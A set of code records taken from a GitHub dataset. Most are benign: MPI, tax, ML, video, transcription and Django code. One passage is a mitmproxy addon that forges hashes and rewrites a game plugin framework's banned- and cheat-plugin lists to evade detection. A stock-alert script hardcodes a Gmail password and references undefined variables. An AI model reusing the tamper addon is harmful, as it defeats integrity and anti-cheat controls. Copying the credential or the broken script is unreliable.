response(self,flow:http.HTTPFlow):\n #detect hash checking\n if self.asset_meta_keyword in flow.request.pretty_url:\n res=json.loads(flow.response.text)\n assets=res['Assets']\n for asset in assets:\n if 'bannedplugin.json' in asset['FileName']:\n print('filename found,modifying')\n asset['Hash']='8ffc185ec1cae72bf30b6490d489a520d5bdbfc1'.upper()\n elif 'cheatplugin.json' in asset['FileName']:\n print('filename found,modifying')\n asset['Hash']='d416be7ffea7451d10ff744e621db7345ceec16d'.upper()\n continue\n flow.response.set_text(json.dumps(res))\n print (flow.response.text)\n #detect banlist checking\n if self.bannedplugin_keyword in flow.request.pretty_url:\n print('keyword : bannedplugin detected')\n print (flow.request.pretty_url)\n print ('injacking....')\n flow.response.set_text(json.dumps([{\"Name\": \"asdfw\",\"AssemblyVersion\": \"1.0\"}]))\n print (flow.response.text)\n #detect cheatlist checking\n if self.chetplugin_keyword in flow.request.pretty_url:\n print('keyword : bannedplugin detected')\n print (flow.request.pretty_url)\n print ('injacking....')\n flow.response.set_text(json.dumps([{\"Name\": \"53F809A7DAC\",\"AssemblyVersion\": \"0.0.0.0\"}]))\n print (flow.response.text)\n \n \n \n","repo_name":"sakuraDan2023/dalamudUnban","sub_path":"src/addons/unbanded.py","file_name":"unbanded.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"71797721866","text":"import math\n\nfrom mpi4py import MPI\nimport numpy as np\n\n# Initialize MPI\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\n\nmaxSize = 1000000\n\nN = 1000\n\n\ndef send(size):\n global N\n\n start_time = MPI.Wtime()\n for i in range(0, N):\n sendBuf = np.empty(size, dtype=np.uint8)\n comm.Bsend(sendBuf, dest=0, tag=123)\n comm.Recv(sendBuf, source=0, tag=123)\n end_time = (MPI.Wtime() - start_time) / N\n return end_time\n\n\ndef receive(size):\n global N\n\n for i in range(0, N):\n recvBuf = np.empty(size, dtype=np.uint8)\n comm.Recv(recvBuf, source=1, tag=123)\n comm.Bsend(recvBuf, dest=1, tag=123)\n\n\ndef test(maxSizeLocal, p_rank, size):\n comm.Barrier()\n buffer = np.empty(maxSizeLocal * 4, dtype='b')\n MPI.Attach_buffer(buffer)\n if p_rank == 0:\n receive(size)\n else:\n time = send(size)\n mbsize = size / math.pow(10, 6)\n v = mbsize / time\n print(v, size)\n MPI.Detach_buffer()\n del buffer\n\n\ndef test_capacity(p_rank):\n global maxSize\n for size in range(0, 1000000, 10000):\n test(maxSize, p_rank, size)\n\n\ndef test_delay(p_rank):\n global maxSize\n size = 1\n test(maxSize, p_rank, size)\n\n\ntest_delay(rank)\n","repo_name":"bszlacht/mpr","sub_path":"zad1/BufferedSend.py","file_name":"BufferedSend.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19754697661","text":"#!/bin/bash/python\n\nimport enum\nimport pandas as pd\nimport logging\nimport argparse\n\n\n\"\"\"\nSHARESIES_COLS = ['Oder ID', 'Trade date', 'Instrument code', 'Market code',\n 'Quantity', 'Price', 'Transaction type', 'Exchange rate', 'Exchange fee',\n 'Transaction fee', 'Currency', 'Amount', 'Transaction method']\n\"\"\"\n\n\ndef peak_holding_differential(transactions, ticker, start_amount=0):\n \"\"\"Calculates the peak holding differential\"\"\"\n transactions = filter_by_ticker(transactions, ticker)\n cur = start_amount\n peak = start_amount\n for idx, row in transactions.iterrows():\n ttype = row['Transaction type']\n if ttype == 'BUY':\n cur += row['Quantity']\n elif ttype == 'SELL':\n cur -= row['Quantity']\n else:\n raise Exception(f'Unexpected transaction type: {ttype}.')\n peak = max(peak, cur)\n end_amount = cur\n peak_diff = max(0, min(peak - end_amount, peak - start_amount))\n return peak_diff\n\n\ndef filter_by_ticker(transactions, ticker):\n df = transactions.loc[lambda df : df['Instrument code'] == ticker, :]\n return df\n\n\ndef filter_by_exchanges(transactions, exchange_codes):\n def f(row):\n return row['Market code'] in exchange_codes\n idx = transactions.apply(f, axis=1)\n res = transactions[idx]\n return res\n\n\ndef filter_by_type(transactions, transaction_type):\n if not transaction_type in {'BUY', 'SELL'}:\n raise Exception(f'Unexpected transaction type: {transaction_type}')\n df = transactions.loc[ \\\n lambda df : df['Transaction type'] == transaction_type, :]\n return df\n \n\ndef average_cost_nzd(transactions, ticker):\n ts = filter_by_type(filter_by_ticker(transactions, ticker), 'BUY')\n total_shares = ts['Quantity'].sum()\n total_cost = (ts['Amount'] * 1/ts['Exchange rate']).sum()\n average_cost = total_cost / total_shares\n return average_cost\n\n\ndef peak_holding_method(transactions, ticker):\n phd = peak_holding_differential(transactions, ticker)\n avg_cost = average_cost_nzd(transactions, ticker)\n factor = 0.05\n ans = factor * phd * avg_cost\n return ans\n\n\ndef gain_method(transactions, ticker):\n avg_cost = average_cost_nzd(transactions, ticker)\n sells = filter_by_type(filter_by_ticker(transactions, ticker), 'SELL')\n sell_amounts = sells['Amount'] * sells['Exchange rate']\n gains = sell_amounts - avg_cost * sells['Quantity']\n total_gain = gains.sum()\n total_gain = max(0, total_gain)\n return total_gain\n \n\ndef taxable_amount(transactions, ticker):\n phd = peak_holding_method(transactions, ticker)\n gain = gain_method(transactions, ticker)\n if phd <= gain:\n ans = phd\n logging.info(f'{ticker}. Using peak method (gain: {gain:.2f}, '\n f'peak: {phd:.2f}).')\n else:\n ans = gain\n logging.info(f'{ticker}. Using gain method (gain: {gain:.2f}, '\n f'peak: {phd:.2f}).')\n logging.info(f'{ticker}. Taxable amount is: {ans:.2f}')\n return ans\n\n\ndef list_tickers(transactions):\n return transactions['Instrument code'].unique().tolist()\n\n\ndef total_taxable_amount(transactions):\n # We are only dealing with NYSE, NASDAQ and ASX at the moment.\n exchanges = transactions['Market code'].unique()\n covered_exchanges = {'NYSE', 'NASDAQ', 'ASX'}\n ignored_exchanges = set(exchanges) - covered_exchanges\n logging.info(f'Transactions present on the following exchanges: '\n f'{exchanges}')\n logging.warning(f'Including exchanges {covered_exchanges}.\\nIgnoring: '\n f'{ignored_exchanges}')\n transactions = filter_by_exchanges(transactions, covered_exchanges)\n ans = 0\n for t in list_tickers(transactions):\n ans += taxable_amount(transactions, t)\n return ans\n\n\ndef import_sharesies_csv(filepath):\n df = pd.read_csv(filepath, header=0)\n return df\n\n\ndef main():\n logging.basicConfig()\n logging.getLogger().setLevel(logging.INFO)\n parser = argparse.ArgumentParser()\n parser.add_argument('file', help='Path to Sharesies transaction csv file.')\n args = parser.parse_args()\n filepath = args.file\n transactions = import_sharesies_csv(filepath)\n taxable_amount = total_taxable_amount(transactions)\n logging.info(f'Total taxable amount: {taxable_amount:.2f}')\n print(f'{taxable_amount:.2f}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kevindoran/nzfiftax","sub_path":"src/nzfiftax/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"73335051466","text":"import torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchtext import data, datasets\nimport numpy as np\n\n\n#print('GPU:', torch.cuda.is_available())\n\ntorch.manual_seed(123) # 为CPU中设置种子,生成随机数\n# 设置随机种子可以确保每次生成固定的随机数,这就使得每次实验结果显示一致了,有利于实验的比较和改进。\n\n\n'''载入数据'''\nTEXT = data.Field(tokenize='spacy', tokenizer_language='en_core_web_sm')\nLABEL = data.LabelField(dtype=torch.float)\ntrain_data, test_data = datasets.IMDB.splits(TEXT, LABEL)\n\n#print('len of train data:', len(train_data)) # len of train data: 25000\n#print('len of test data:', len(test_data)) # len of test data: 25000\n\n#print(train_data.examples[15].text)\n#print(train_data.examples[15].label)\n\n# 对文本内容进行编码\nTEXT.build_vocab(train_data, max_size=10000, vectors='glove.6B.100d')\nLABEL.build_vocab(train_data)\n\n\nbatchsz = 16\ndevice = torch.device('cuda')\ntrain_iterator, test_iterator = data.BucketIterator.splits(\n (train_data, test_data),\n batch_size=batchsz,\n device=device\n)\n\n\nclass MyLSTM(nn.Module):\n\n def __init__(self, vocab_size, embedding_dim, hidden_dim):\n \"\"\"\n \"\"\"\n super(MyLSTM, self).__init__()\n\n # [0-10001] => [100]\n self.embedding = nn.Embedding(vocab_size, embedding_dim) # 对单词进行编码。\n # 编码vocab_size个单词,每个单词编码为embedding_dim维度的向量\n # [100] => [256]\n self.rnn = nn.LSTM(embedding_dim, hidden_dim, num_layers=2,\n bidirectional=True, dropout=0.5) # memory是hidden_dim\n # [256*2] => [1]\n self.fc = nn.Linear(hidden_dim * 2, 1)\n self.dropout = nn.Dropout(0.5)\n\n def forward(self, x):\n \"\"\"\n x: [seq_len, b] vs [b, 3, 28, 28]\n \"\"\"\n # [seq, b, 1] => [seq, b, 100]\n embedding = self.dropout(self.embedding(x))\n\n # output: [seq, b, hid_dim*2]\n # hidden/h: [num_layers*2, b, hid_dim]\n # cell/c: [num_layers*2, b, hid_di]\n output, (hidden, cell) = self.rnn(embedding)\n\n # [num_layers*2, b, hid_dim] => 2 of [b, hid_dim] => [b, hid_dim*2]\n hidden = torch.cat([hidden[-2], hidden[-1]], dim=1)\n\n # [b, hid_dim*2] => [b, 1]\n hidden = self.dropout(hidden)\n out = self.fc(hidden)\n\n return out\n\n\n# 定义GRU网络\n\nclass GRUNet(nn.Module):\n def __init__(self, vocab_size,embedding_dim, hidden_dim, layer_dim, output_dim):\n \"\"\"\n vocab_size:词典长度\n embedding_dim:词向量的维度\n hidden_dim: GRU神经元个数\n layer_dim: GRU的层数\n output_dim:隐藏层输出的维度(分类的数量)\n \"\"\"\n super(GRUNet, self).__init__()\n self.hidden_dim = hidden_dim ## GRU神经元个数\n self.layer_dim = layer_dim ## GRU的层数\n ## 对文本进行词项量处理\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n # LSTM + 全连接层\n self.gru = nn.GRU(embedding_dim, hidden_dim, layer_dim,\n batch_first=True)\n self.fc1 = nn.Sequential(\n nn.Linear(hidden_dim, hidden_dim),\n torch.nn.Dropout(0.5),\n torch.nn.ReLU(),\n nn.Linear(hidden_dim, output_dim)\n )\n def forward(self, x):\n embeds = self.embedding(x)\n # r_out shape (batch, time_step, output_size)\n # h_n shape (n_layers, batch, hidden_size)\n r_out, h_n = self.gru(embeds, None) # None 表示初始的 hidden state 为0\n # 选取最后一个时间点的out输出\n out = self.fc1(r_out[:, -1, :])\n return out\n\n\n'''构建网络'''\nLSTM = MyLSTM(len(TEXT.vocab), 100, 256)\n#GRU = GRUNet(len(TEXT.vocab), 100, 256, 1, 1)\nstate_dict = torch.load('net_params.pth')\nLSTM.load_state_dict(state_dict)\n\npretrained_embedding = TEXT.vocab.vectors\nprint('pretrained_embedding:', pretrained_embedding.shape)\nLSTM.embedding.weight.data.copy_(pretrained_embedding)\n#GRU.embedding.weight.data.copy_(pretrained_embedding)\nprint('embedding layer inited.')\n\noptimizer = optim.Adam(LSTM.parameters(), lr=5e-4)\n#optimizer = optim.Adam(GRU.parameters(), lr=5e-4)\ntorch.optim.lr_scheduler.StepLR(optimizer, 2, gamma=0.5, last_epoch=-1)\ncriteon = nn.BCEWithLogitsLoss().to(device)\nLSTM.to(device)\n#GRU.to(device)\n\ntrain_loss = []\ntrain_acc = []\ntest_loss = []\ntest_acc = []\n\n\ndef binary_acc(preds, y):\n \"\"\"\n get accuracy\n \"\"\"\n preds = torch.round(torch.sigmoid(preds))\n correct = torch.eq(preds, y).float()\n acc = correct.sum() / len(correct)\n return acc\n\n\ndef train(model, iterator, optimizer, criteon):\n avg_acc = []\n avg_loss = []\n model.train()\n\n for i, batch in enumerate(iterator):\n\n # [seq, b] => [b, 1] => [b]\n if hasattr(torch.cuda, 'empty_cache'):\n torch.cuda.empty_cache()\n pred = model(batch.text).squeeze(1)\n #print(pred.size())\n #print(batch.label.size())\n #\n loss = criteon(pred, batch.label)\n avg_loss.append(loss.item())\n acc = binary_acc(pred, batch.label).item()\n avg_acc.append(acc)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if i % 50 == 0:\n print(i, acc)\n\n avg_acc = np.array(avg_acc).mean()\n train_loss.append(np.array(avg_loss).mean())\n train_acc.append(avg_acc)\n print('train loss', np.array(avg_loss).mean())\n print('avg acc:', avg_acc)\n torch.save(model.state_dict(),'net_params.pth')\n\n\ndef eval(model, iterator, criteon):\n avg_acc = []\n avg_loss = []\n\n model.eval()\n\n with torch.no_grad():\n for batch in iterator:\n # [b, 1] => [b]\n pred = model(batch.text).squeeze(1)\n\n #\n loss = criteon(pred, batch.label)\n avg_loss.append(loss.item())\n\n acc = binary_acc(pred, batch.label).item()\n avg_acc.append(acc)\n\n avg_acc = np.array(avg_acc).mean()\n test_loss.append(np.array(avg_loss).mean())\n test_acc.append(avg_acc)\n print('test loss', np.array(avg_loss).mean())\n print('>>test:', avg_acc)\n\n\nfor epoch in range(10):\n train(LSTM, train_iterator, optimizer, criteon)\n eval(LSTM, test_iterator, criteon)","repo_name":"LouZhipeng/traning","sub_path":"task3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42173727944","text":"import pandas as pd # Para evitar escrever pandas e trocar pela escrita apenas de pd para facilitar\nfrom pandas_datareader import data as web # Evita a escrita do data e troca pelo web\nimport time\nimport datetime\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nimport mariadb\n\ndef verMinDate(date,vals): ## função para retornar a date que ocorreu o valor minimo\n for i in range(len(vals)):\n if vals[i] == min(vals):\n return date[i]\n\ndata_final = time.strftime('%m-%d-%y', time.localtime(time.time()))\n## criando a data inicial (3 meses)\none_day = 60*60*24\ninterval = 6 ## intervalo de tempo em meses\n\ndata_inicial = time.strftime('%m-%d-%y', time.localtime(time.time()-interval*30*one_day))\ndata_inicial = datetime.datetime.strptime(data_inicial, '%m-%d-%y') ##definindo a data inicial\n\nmsg_aval_since = \"\"\"\\\nProcurando por uma janela de oportunidade de venda para os fundos da planilha 'paricipacao.xlsx'.\nDesde a data {}(Mês-Dia-Ano) até agr\n\"\"\"\nprint(msg_aval_since.format(data_inicial))\n\nempresas_df = ('BNFS11', 'BBPO11') # FIIs na carteira)\n\n#conectando com o banco de dados\nmydb = mariadb.connect(\n\thost=\"localhost\",\n\tuser=\"root\",\n\tpassword=None,\n\tdatabase=\"invest\"\n)\nmycursor = mydb.cursor()\n\n\nfor empresa in empresas_df:\n # montando a lista para conter os dados dos fiis\n sql = f\"SELECT cot, ultInsert FROM fiib3daily WHERE cod = '{empresa}' ORDER BY ultInsert\" ## buscando o\n # ultimo balanço das empresas no db\n mycursor.execute(sql)\n result = mycursor.fetchall()\n cot_dados = [] # para conter os dados das cotações\n\n for r in result:\n if r[1] >= data_inicial: # filtrando as datas acima da inicial\n cot_dados.append(r)\n\n df = pd.DataFrame(cot_dados, columns=('cotacao', 'data')) # defininco o data frame\n\n if len(df['cotacao']) > 1: # verificando se tem pelo menos mais de 2 valores para a cotação\n var = ((df['cotacao'].iloc[len(df['cotacao']) - 1]) - min(df['cotacao']))/min(df['cotacao'])\n\n wind = 0.2 # valor para janela de oportunidade\n\n if var > wind:\n\n sender_email = \"emailautomatico11@gmail.com\" # Enter your address\n receiver_email = \"lucasoliveira5978@gmail.com\" # Enter receiver address\n password = \"nucxkwaaqoazgnxh\"\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = f\"!Oportunidade de venda de FII {empresa}\"\n message[\"From\"] = sender_email\n message[\"To\"] = receiver_email\n\n # Create the plain-text and HTML version of your message\n msg = \"\"\"\\\n Há uma janela de oportunidade de venda para {0}.\n O fundo subiu mais de {1} % nos últimos {2} meses\n \"\"\"\n\n text = msg.format(empresa, round(min(df[\"Adj Close\"]), 2), str(verMinDate(dates,vals))[0:10],\n round(df[\"Adj Close\"][len(df[\"Adj Close\"])-1], 2), round(var*100,2))\n\n msg = \"\"\"\\\n \n \n

Há uma janela de oportunidade de venda para:

\n
\n {0}
\n

O fundo estava cotado no valor de R$ {1} no dia {2},

\n

hoje está cotado no valor de R$ {3},

\n

\n Uma subida de {4} %

\n \n \n \"\"\"\n\n html = msg.format(empresa, round(max(df[\"cotacao\"]), 2), str(verMinDate(df['data'], df['cotacao']))[0:10],\n round(df[\"cotacao\"].iloc[len(df[\"cotacao\"])-1], 2), round(-var*100,2))\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part1)\n message.attach(part2)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(\n sender_email, receiver_email, message.as_string().encode('utf-8')\n )\n else:\n msg = \"Empresa {} analisado. Sem oportunidade\"\n print(msg.format(empresa))\n\n","repo_name":"Lucas-Oliveira-wd/fii_data","sub_path":"lkng_for_sell_fii.py","file_name":"lkng_for_sell_fii.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3743016219","text":"from pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph.opengl as gl\nimport numpy as np\nimport sys\nimport time\nimport signal\nimport subprocess\nimport pyqtgraph as pg\nimport pyqtgraph.exporters\nfrom pyqtgraph import functions as fn\nimport io\n\ncanvas_width, canvas_height = 1920, 1080\n# canvas_width, canvas_height = 1920 * 2, 1080 * 2\n\nshape = canvas_width, canvas_height\n\noutf = 'tmp.mp4'\n\ncmd = ('ffmpeg',\n '-loglevel', 'trace',\n '-hwaccel', 'videotoolbox', \n # '-threads', '16',\n '-y', '-r', '60', # overwrite, 60fps\n '-s', f'{canvas_width}x{canvas_height}', # size of image string\n '-pix_fmt', 'argb', # format\n # '-pix_fmt', 'videotoolbox_vld', # format\n # '-pix_fmt', 'yuv420p', # format\n # '-f', 'rawvideo',\n '-i', '-', # tell ffmpeg to expect raw video from the pipe\n # '-c:v', 'hevc_videotoolbox', '-pix_fmt', 'yuv420p', '-tag:v', 'hvc1', '-profile:v', 'main10', '-b:v', '10M', '-an', '-sn',\n '-c:v', 'hevc_videotoolbox', '-pix_fmt', 'yuv420p', '-tag:v', 'hvc1', '-profile:v', 'main10',\n '-b:v', '16M',\n # '-c:v', 'h264_videotoolbox', '-pix_fmt', 'yuv420p', '-b:v', '5M',\n # '-c:v', 'h264_videotoolbox', '-b:v', '1M', '-an', '-sn', \n # '-pix_fmt', 'videotoolbox_vld', # format\n\n \n outf)\n # '-c:v', 'hevc_videotoolbox', '-profile:v', 'main10', '-tag:v', 'hvc1', '-b:v', '1M', '-an', '-sn', outf)\n # '-c:v', 'libx265', '-tag:v', 'hvc1', '-b:v', '1M', '-an', '-sn', outf)\n\n # '-vcodec', 'h264_videotoolbox', '-profile:v', 'high', outf) # output encoding\n\n# ffmpeg -i [input_file] -c:v hevc_videotoolbox -profile:v main10 -tag:v hvc1 -b:v 10000k -an -sn output_filename.mp4\n# [format @ 0x7ff5caf04b40] Setting 'pix_fmts' to value 'videotoolbox_vld|nv12|yuv420p|p010le'\np = subprocess.Popen(cmd, stdin=subprocess.PIPE)\n\n\n# ib = io.BytesIO()\n\n# -vcodec hevc_videotoolbox\nprint('f')\nclass Visualizer(QtGui.QWidget):\n def __init__(self):\n super().__init__()\n\n # pg.setConfigOption('background', 'w')\n # pg.setConfigOption('foreground', 'k')\n\n self.layout = QtGui.QVBoxLayout()\n\n # self.app = QtGui.QApplication(sys.argv)\n\n\n self.glayout = pg.GraphicsLayoutWidget()\n self.view = self.glayout.addViewBox(lockAspect=False)\n # self.view = self.glayout.addViewBox(lockAspect=True)\n self.img = pg.ImageItem(border='w')\n self.view.addItem(self.img)\n # bipolar colormap\n pos = np.array([0., 1., 0.5, 0.25, 0.75])\n color = np.array([[0,255,255,255], [255,255,0,255], [0,0,0,255], [0, 0, 255, 255], [255, 0, 0, 255]], dtype=np.ubyte)\n cmap = pg.ColorMap(pos, color)\n lut = cmap.getLookupTable(0.0, 1.0, 256)\n # set colormap\n self.img.setLookupTable(lut)\n # self.img.setLevels([-140, -50])\n self.img.setLevels([-50, 20])\n self.layout.addWidget(self.glayout)\n\n self.setLayout(self.layout)\n self.setGeometry(10, 10, 500, 500)\n \n self.show() \n self.hide()\n # self.close()\n\n\n self.update()\n\n\n def start(self):\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n\n\n\n def update(self):\n print('lol')\n for frame in range(300):\n\n self.img.setImage(np.random.random((canvas_width, canvas_height)), autoLevels=True)\n exporter = pg.exporters.ImageExporter(self.view)\n\n exporter.params.param('width').setValue(canvas_width, blockSignal=exporter.widthChanged)\n exporter.params.param('height').setValue(canvas_height, blockSignal=exporter.heightChanged)\n\n im = exporter.export(toBytes=True)\n\n buffer = QtCore.QBuffer()\n buffer.open(QtCore.QIODevice.WriteOnly)\n # buffer.open(QtCore.QIODevice.ReadWrite)\n im.save(buffer, 'PNG')\n b = buffer.data()\n # print(b)\n\n # print(hasattr(z, 'data'))\n # print(z.pixelFormat().yuvLayout())\n # print(z.bits())\n # b = z.data.tobytes()\n # z.save(p.stdin, 'PNG')\n p.stdin.write(b)\n # ib.write(b)\n\n\n\n p.communicate()\n\n\n\n# Start Qt event loop unless running in interactive mode.\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n gui = Visualizer()\n gui.show()\n app.exec()\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n","repo_name":"tandav/spectrogram","sub_path":"pyqtgraph_video/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70510375305","text":"import csv\nimport re\nimport os\nimport json\nimport yt_dlp\nimport whisper\nfrom tqdm import tqdm\nimport ssl\nimport threading\nfrom queue import Queue\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n# Folder to save audio and transcripts\naudio_folder = 'audio_files'\ntranscripts_folder = 'transcripts2'\n\n# Queue for processing videos\nvideo_queue = Queue()\n\n\ndef sanitize_filename(filename):\n \"\"\"\n Removes invalid characters from filename and truncates it if it's too long.\n \"\"\"\n s = re.sub(r'[\\\\/*?:\"<>|]', '', filename)\n if len(s) > 200:\n s = s[:200]\n return s\n\n\ndef download_audio_and_get_title(video_id, ydl):\n audio_file_path = f'{audio_folder}/{video_id}.mp3'\n title = None\n info_dict = ydl.extract_info(\n f'https://www.youtube.com/watch?v={video_id}', download=False)\n title = sanitize_filename(info_dict.get('title', video_id))\n\n transcript_file = f\"{transcripts_folder}/{title}.txt\"\n # Check if either the audio file or the transcript file already exists\n if not os.path.exists(audio_file_path) and not os.path.exists(transcript_file):\n ydl.download([f'https://www.youtube.com/watch?v={video_id}'])\n else:\n print(f\"Skipping {video_id} as audio or transcript already exists.\")\n title = None # Set title to None to indicate skipping\n\n return title\n\n\ndef transcribe_audio_with_whisper(audio_file):\n model = whisper.load_model(\"small\")\n result = model.transcribe(audio_file)\n return result[\"text\"]\n\n\ndef process_video(video_id, video_url, ydl):\n title = download_audio_and_get_title(video_id, ydl)\n if title:\n # Change the extension to .json\n transcript_file = f\"{transcripts_folder}/{title}.json\"\n audio_file = f\"{audio_folder}/{video_id}.mp3\"\n transcript_text = transcribe_audio_with_whisper(audio_file)\n\n # Include the video URL in the transcript data\n transcript_data = {\n \"url\": video_url,\n \"title\": title,\n \"transcript\": transcript_text\n }\n\n with open(transcript_file, 'w', encoding=\"utf-8\") as outfile:\n json.dump(transcript_data, outfile, ensure_ascii=False,\n indent=4) # Write as formatted JSON\n else:\n print(f\"Skipped processing for {video_id}.\")\n\n\ndef worker(ydl):\n while True:\n video_id, video_url = video_queue.get()\n process_video(video_id, video_url, ydl)\n video_queue.task_done()\n\n\ndef download_transcripts_from_csv(file_path, ydl):\n with open(file_path, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in tqdm(reader):\n url = row[0]\n if \"list=\" in url:\n try:\n info_dict = ydl.extract_info(url, download=False)\n if 'entries' in info_dict:\n for video in info_dict['entries']:\n if video:\n video_url = video.get('webpage_url')\n video_queue.put((video['id'], video_url))\n else:\n print(f\"No entries found for playlist: {url}\")\n except Exception as e:\n print(f\"Error extracting playlist information: {e}\")\n else:\n video_id = url.split('v=')[-1]\n video_queue.put((video_id, url))\n\n\nif __name__ == \"__main__\":\n os.makedirs(audio_folder, exist_ok=True)\n os.makedirs(transcripts_folder, exist_ok=True)\n\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n 'outtmpl': f'{audio_folder}/%(id)s.%(ext)s',\n 'ignoreerrors': True,\n 'extract_flat': True,\n }\n\n ydl = yt_dlp.YoutubeDL(ydl_opts)\n\n # Create and start worker threads\n for i in range(4):\n t = threading.Thread(target=worker, args=(ydl,))\n t.daemon = True\n t.start()\n\n csv_path = 'urls.csv'\n download_transcripts_from_csv(csv_path, ydl)\n\n video_queue.join()","repo_name":"njwright92/comicBot","sub_path":"transcript_downloader.py","file_name":"transcript_downloader.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39446277845","text":"def find(s):\n s1 = []\n s1_c = 0\n s2 = []\n s2_c = 0\n for i, ch in enumerate(s):\n if ch == \"(\":\n s1.append(ch)\n elif ch == \")\":\n if len(s1) > 0:\n s1.pop()\n s1_c += 1\n elif ch == \"[\":\n s2.append(ch)\n elif ch == \"]\":\n if len(s2) > 0:\n s2.pop()\n s2_c += 1\n return s1_c + s2_c\n\n\ndef main():\n t = int(input())\n\n while --t:\n s = input()\n\n print(find(s))\n\n\ndef test():\n print(find(\")([)]\"))\n\n\nmain()\n","repo_name":"alexro/pypypy","sub_path":"code_forces/1452C.py","file_name":"1452C.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4260260092","text":"from functools import partial\nfrom uuid import UUID\n\nfrom dateutil.parser import parse as dateutil_parse\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.fields import ReadOnlyField, UUIDField\n\nfrom datahub.core.constants import Country as CountryEnum\nfrom datahub.core.validate_utils import DataCombiner\nfrom datahub.core.validators import InRule, OperatorRule, RulesBasedValidator, ValidationRule\nfrom datahub.metadata.models import AdministrativeArea, Country\n\nMAX_LENGTH = settings.CHAR_FIELD_MAX_LENGTH\n\n\nclass ConstantModelSerializer(serializers.Serializer):\n \"\"\"Constant models serializer.\"\"\"\n\n id = serializers.ReadOnlyField()\n name = serializers.ReadOnlyField()\n disabled_on = serializers.ReadOnlyField()\n\n\nclass PermittedFieldsModelSerializer(serializers.ModelSerializer):\n \"\"\"Lets you get permitted fields only.\n\n Needs 'permissions' attribute on Meta class in following format:\n permissions = {\n 'app_name.permission': 'field'\n }\n\n If user doesn't have required permission, corresponding field will be filtered out.\n\n Note: The current implementation does not allow access to the field if request.user is None.\n \"\"\"\n\n def get_fields(self):\n \"\"\"Gets filtered dictionary of fields based on permissions.\"\"\"\n assert hasattr(self.Meta, 'permissions'), (\n 'Class {serializer_class} missing \"Meta.permissions\" attribute'.format(\n serializer_class=self.__class__.__name__,\n )\n )\n\n fields = super().get_fields()\n request = self.context.get('request', None)\n\n if request:\n permissions = self.Meta.permissions\n for permission, field in permissions.items():\n if not request.user or not request.user.has_perm(permission):\n del fields[field]\n return fields\n\n\nclass NestedRelatedField(serializers.RelatedField):\n \"\"\"DRF serialiser field for foreign keys and many-to-many fields.\n\n Serialises as a dict with 'id' plus other specified keys.\n \"\"\"\n\n default_error_messages = {\n 'required': 'This field is required.',\n 'missing_pk': 'pk not provided.',\n 'does_not_exist': 'Invalid pk \"{pk_value}\" - object does not exist.',\n 'incorrect_type': 'Incorrect type. Expected object, received {'\n 'data_type}.',\n }\n\n def __init__(self, model, extra_fields=('name',), **kwargs):\n \"\"\"Initialises the related field.\n\n :param model: Model of the related field.\n :param extra_fields: List of extra fields to include in the representation.\n Can contain field names as strings or as tuples of\n (field name, DRF field).\n E.g. ['field1', ('field2', CharField())]\n :param kwargs: Keyword arguments to pass to\n RelatedField.__init__()\n \"\"\"\n super().__init__(**kwargs)\n\n model_class = (apps.get_model(model) if isinstance(model, str) else\n model)\n\n self.pk_field = UUIDField()\n self._fields = [\n field if isinstance(field, tuple) else (field, ReadOnlyField())\n for field in extra_fields\n ]\n self._model = model_class\n\n def get_queryset(self):\n \"\"\"Returns the queryset corresponding to the model.\"\"\"\n return self._model.objects.all()\n\n def to_internal_value(self, data):\n \"\"\"Converts a user-provided value to a model instance.\"\"\"\n try:\n if isinstance(data, (str, UUID)):\n id_repr = data\n else:\n id_repr = data['id']\n data = self.pk_field.to_internal_value(id_repr)\n return self.get_queryset().get(pk=data)\n except ObjectDoesNotExist:\n self.fail('does_not_exist', pk_value=data)\n except KeyError:\n self.fail('missing_pk')\n except (TypeError, ValueError):\n self.fail('incorrect_type', data_type=type(data).__name__)\n\n def to_representation(self, value):\n \"\"\"Converts a model instance to a dict representation.\"\"\"\n if not 